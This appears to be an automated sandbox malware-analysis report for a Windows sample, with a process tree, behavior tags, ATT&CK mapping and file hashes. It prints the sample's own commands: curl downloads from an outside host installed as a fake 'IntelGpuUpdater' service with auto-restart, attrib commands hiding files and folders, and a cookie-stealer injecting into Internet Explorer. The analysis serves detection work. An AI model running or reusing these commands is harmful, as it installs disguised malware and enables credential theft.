- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\test.exe" +s +h5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local\test.exe" +s +h6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1704
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local" +s +h5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local" +s +h6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2368
-
-
-
C:\Users\Admin\AppData\Local\Temp\ChromeCookies\ChromeCookie.exe"C:\Users\Admin\AppData\Local\Temp\ChromeCookies\ChromeCookie.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\SysWOW64\notepad.exenotepad7⤵
- System Location Discovery: System Language Discovery
PID:2532
-
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 54⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4008
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000" > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
PID:1544 -
C:\Windows\SysWOW64\cmd.execmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5056 -
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/test.exe4⤵
- System Location Discovery: System Language Discovery
PID:1600
-
-
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/nssm.exe4⤵
- System Location Discovery: System Language Discovery
PID:4852
-
-
C:\Windows\IntelGpuUpdaterHelper.exeC:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4696
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc start IntelGpuUpdater4⤵
- System Location Discovery: System Language Discovery
PID:1540 -
C:\Windows\SysWOW64\sc.exesc start IntelGpuUpdater5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/50004⤵
- System Location Discovery: System Language Discovery
PID:3552 -
C:\Windows\SysWOW64\sc.exesc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/50005⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2272
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause2⤵
- System Location Discovery: System Language Discovery
PID:2004
-
-
C:\Windows\IntelGpuUpdaterHelper.exeC:\Windows\IntelGpuUpdaterHelper.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4552 -
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1564 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Windows\IntelGpuUpdater.exe" +s +h3⤵
- System Location Discovery: System Language Discovery
PID:1408 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\IntelGpuUpdater.exe" +s +h4⤵
- Sets file to hidden
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3672
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Windows" +s +h3⤵
- System Location Discovery: System Language Discovery
PID:3528 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows" +s +h4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:736
-
-
-
C:\Windows\TEMP\ChromeCookies\ChromeCookie.exe"C:\Windows\TEMP\ChromeCookies\ChromeCookie.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2340 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"4⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4436 -
C:\Windows\notepad.exenotepad5⤵
- Modifies data under HKEY_USERS
PID:1816
-
-
-
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1552
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3296
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4324
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4896
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3980
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1788
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
251KB
MD557bd4f73690590693b5b921f29679410
SHA1c2cb47bf602541043589e979f21c3d7c1698e3ac
SHA2568a3de78cf177be4c37c1525becf05af336c1dc2a4d181cae79f6903754902efa
SHA51200b543644058a93f1c0a13e4d40b1c4e76f9581325f1773d79983761ca6903643e5a44717e7785b27a8fac2a6609c19032e3f412d3339e9cc5dc697791890318
-
Filesize
256KB
MD5c721739bd54dd9beb16909f6807b73c5
SHA15ec54658246914144293357f302e68bf9972fb71
SHA2567376ce1eefd786d30efbecb716a13e9d23d27cfc362ce1bbc2fbebdf4fbf54ea
SHA5120800c5f0425237219d7d34654cc021b8b8aa1fce1545ba9815c7be12a623edb08a098fd4de40ccc867487639647cb7f316316464a3a0bdb0650fdd2852408b4e